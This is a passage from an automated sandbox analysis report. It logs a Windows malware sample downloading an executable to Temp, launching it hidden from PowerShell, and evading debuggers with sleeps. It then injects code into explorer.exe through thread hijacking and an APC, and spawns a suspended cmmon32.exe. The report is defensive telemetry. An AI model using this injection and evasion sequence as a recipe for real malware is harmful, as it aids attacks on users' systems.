| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 30492 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 30492 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 30492 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 30492 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 30492 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 30492 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 54850, size_out = 15972 |
|
1 | |
| Inet | Read Response | size = 54850, size_out = 15972 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 15972 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 38878, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 38878, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 35974, size_out = 24684 |
|
1 | |
| Inet | Read Response | size = 35974, size_out = 24684 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 23492 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 11290, size_out = 11290 |
|
1 | |
| Inet | Read Response | size = 11290, size_out = 11290 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 11290 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Process | Create | process_name = "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe", os_pid = 0xb84, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe |
| Command Line | "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:57, Reason: Child Process |
| Unmonitor | End Time: 00:02:19, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:22 |
| Information | Value |
|---|---|
| PID | 0xb84 |
| Parent PID | 0xb44 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B88
0x
BCC
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8~1\appdata\local\temp\~dff8ff715eb6fd8eb1.tmp | 6.00 KB (6144 bytes) |
MD5:
79f341fd3ffdd288d176c7ff38c456c3
SHA1: da6159d0bb110771e34af83252e0c0d5929d7e3a SHA256: 71ede8a3db6c3437883e1ce09890aa1789ee8a4777263b8f5cd0324d493ed884 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsTNT, address_out = 0x0 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c676b5 |
|
1 | |
| Mutex | Create | - |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, size = 260 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x75580000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x755e70a1 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\oleaut32.dll, base_address = 0x75580000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = DispCallFunc, address_out = 0x75593dcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x755907b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x755b1ca9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = CreateTypeLib2, address_out = 0x75598e70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDateFromUdate, address_out = 0x75597684 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarUdateFromDate, address_out = 0x7559cc98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = GetAltMonthNames, address_out = 0x755c903a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x75596231 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x75595fea |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecFromR4, address_out = 0x755a3f94 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecFromR8, address_out = 0x755a4e9e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecFromDate, address_out = 0x755cdb72 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecFromI4, address_out = 0x755b2a8c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecFromCy, address_out = 0x755cd737 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarR4FromDec, address_out = 0x755ce015 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x755ccc3d |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x755cd1c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x755cd48c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x755cd4c6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x755cd509 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArraySetIID, address_out = 0x7559e7bb |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x7559e496 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x7559ddf1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x755cd53f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFormat, address_out = 0x755d2055 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFormatDateTime, address_out = 0x755d20ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFormatNumber, address_out = 0x755d2151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFormatPercent, address_out = 0x755d21f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFormatCurrency, address_out = 0x755d2288 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarWeekdayName, address_out = 0x755d2335 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarMonthName, address_out = 0x755d23d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarAdd, address_out = 0x755a5934 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarAnd, address_out = 0x755a5a98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarCat, address_out = 0x755a59b4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDiv, address_out = 0x755fe405 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarEqv, address_out = 0x755fef07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarIdiv, address_out = 0x755ff00a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarImp, address_out = 0x755fef47 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarMod, address_out = 0x755ff15e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarMul, address_out = 0x755fdbd4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarOr, address_out = 0x755fecfa |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarPow, address_out = 0x755fea66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarSub, address_out = 0x755fd332 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarXor, address_out = 0x755fee2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarAbs, address_out = 0x755fca11 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarFix, address_out = 0x755fcc5f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarInt, address_out = 0x755fcde7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarNeg, address_out = 0x755fc802 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarNot, address_out = 0x755fec66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarRound, address_out = 0x755fd155 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarCmp, address_out = 0x7559b0dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecAdd, address_out = 0x755b5f3e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarDecCmp, address_out = 0x755a4fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarBstrCat, address_out = 0x755a0d2c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarCyMulI4, address_out = 0x755b59ed |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VarBstrCmp, address_out = 0x7558f8b8 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\ole32.dll, base_address = 0x766f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoCreateInstanceEx, address_out = 0x76739d4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x76700782 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, size = 260 |
|
2 | |
| Module | Load | module_name = SXS.DLL, base_address = 0x75000000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75047685 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\user32.dll, base_address = 0x76620000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x766367cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x76633622 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x76630ca1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x766294c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x766334a3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x7662c34e |
|
1 | |
| Window | Create | class_name = ThunderRT6Main, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| Window | Create | class_name = VBMsoStdCompMgr, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | class_name = VBMsoStdCompMgr, index = 0, new_long = 28713116 |
|
1 | |
| Window | Create | class_name = VBFocusRT6, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Window | Create | window_name = Delstaterne, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | window_name = Delstaterne, index = 18446744073709551600, new_long = 33554432 |
|
1 | |
| Module | Load | module_name = NTDLL, base_address = 0x76f50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x76f96678 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76c5ba46 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x76620000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetDesktopWindow, address_out = 0x766301a9 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x76fa2dd6 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetLastError, address_out = 0x76c5bb08 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetErrorMode, address_out = 0x76c64a51 |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x76f50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = NtYieldExecution, address_out = 0x76f96aa8 |
|
1 | |
| System | Sleep | duration = 15 milliseconds (0.015 seconds) |
|
32 | |
| System | Sleep | duration = 8000 milliseconds (8.000 seconds) |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x76f50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x76f95f18 |
|
1 | |
| Module | Load | module_name = advapi32, base_address = 0x754d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x754e4907 |
|
1 | |
| Module | Load | module_name = advapi32, base_address = 0x754d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x754e48ef |
|
1 | |
| Module | Load | module_name = advapi32, base_address = 0x754d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x754e469d |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x76c5cee8 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x76c61400 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x76c5ca7c |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReadFile, address_out = 0x76c596fb |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFileSize, address_out = 0x76c50273 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = UnmapViewOfFile, address_out = 0x76c5db13 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualProtectEx, address_out = 0x76c9f5d9 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLongPathNameA, address_out = 0x76c9f47f |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x76c52331 |
|
1 | |
| Module | Load | module_name = IPHlpApi, base_address = 0x733c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x733c9263 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAllocEx, address_out = 0x76c4c1b6 |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x75810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = ShellExecuteA, address_out = 0x75a57078 |
|
1 | |
| Module | Load | module_name = User32, base_address = 0x76620000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumWindows, address_out = 0x7663375b |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x76620000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = DestroyWindow, address_out = 0x7662b2f4 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x76620000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumThreadWindows, address_out = 0x7662b712 |
|
1 | |
| Module | Unmap | process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe |
|
1 | |
| File | Create | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, type = extended |
|
1 | |
| File | Read | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, offset = 0, size = 1288488 |
|
1 | |
| File | Get Info | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, type = extended |
|
1 | |
| Debug | Check for Presence | c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Set Environment String | name = 664908S9, value = C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, environment = 0 |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1239756 |
|
1 | |
| Module | Map | process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x3b0000 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Thread | Open | os_tid = 0x614 |
|
1 | |
| Thread | Suspend | os_tid = 0x614 |
|
1 | |
| Thread | Get Context | os_tid = 0x614 |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1237988 |
|
1 | |
| Module | Map | process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xa200000 |
|
1 | |
| Module | Map | process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x6240000 |
|
1 | |
| Module | Unmap | process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe |
|
1 | |
| Thread | Set Context | process_name = c:\windows\explorer.exe, os_tid = 0x614 |
|
1 | |
| Thread | Queue APC | process_name = c:\windows\explorer.exe, os_tid = 0x614 |
|
1 | |
| Thread | Resume | process_name = c:\windows\explorer.exe, os_tid = 0x614 |
|
1 | |
| System | Sleep | duration = 1237300 milliseconds (1237.300 seconds) |
|
1 | |
| Memory | Read | process_name = c:\windows\explorer.exe, address = 0x6347a00, size = 680 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Thread | Open | process_name = c:\windows\system32\cmmon32.exe, os_tid = 0xbd8 |
|
1 | |
| File | Create | filename = \??\C:\Windows\System32\cmmon32.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Windows\System32\cmmon32.exe, type = extended |
|
1 |
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\explorer.exe |
| Command Line | C:\Windows\Explorer.EXE |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:06, Reason: Injection |
| Unmonitor | End Time: 00:02:19, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:13 |
| Information | Value |
|---|---|
| PID | 0x610 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AA4
0x
9D8
0x
9C8
0x
64
0x
548
0x
66C
0x
5C8
0x
664
0x
778
0x
674
0x
18C
0x
120
0x
7E8
0x
418
0x
160
0x
144
0x
76C
0x
760
0x
730
0x
72C
0x
728
0x
724
0x
720
0x
714
0x
70C
0x
704
0x
6F8
0x
644
0x
640
0x
638
0x
634
0x
630
0x
61C
0x
614
0x
CC0
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #6: c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe | 0xb88 | address = 0x6240000, size = 1441792 |
|
1 | |
| Modify Control Flow | #6: c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe | 0xb88 | os_tid = 0x614, address = 0x630dba7 |
|
1 | |
| Modify Control Flow | #6: c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe | 0xb88 | os_tid = 0x614, address = 0x630dbac |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, type = extended |
|
1 | |
| File | Create | filename = \??\C:\Windows\System32\cmmon32.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Windows\System32\cmmon32.exe, type = extended |
|
1 | |
| File | Read | filename = \??\C:\Windows\System32\cmmon32.exe, offset = 0, size = 43008 |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\cmmon32.exe, os_pid = 0xbd4, creation_flags = CREATE_SUSPENDED, CREATE_DETACHED_PROCESS, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Memory | Read | process_name = C:\Windows\System32\cmmon32.exe, address = 0x7ffda008, size = 4 |
|
1 | |
| File | Create | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, desired_access = FILE_EXECUTE, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x3710000 |
|
1 |
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\cmmon32.exe |
| Command Line | "C:\Windows\System32\cmmon32.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:19, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:12 |
| Information | Value |
|---|---|
| PID | 0xbd4 |
| Parent PID | 0x610 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BD8
0x
C7C
0x
CCC
0x
CD0
0x
CE0
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\roaming\olo0nds-\olologim.jpeg | 74.99 KB (76788 bytes) |
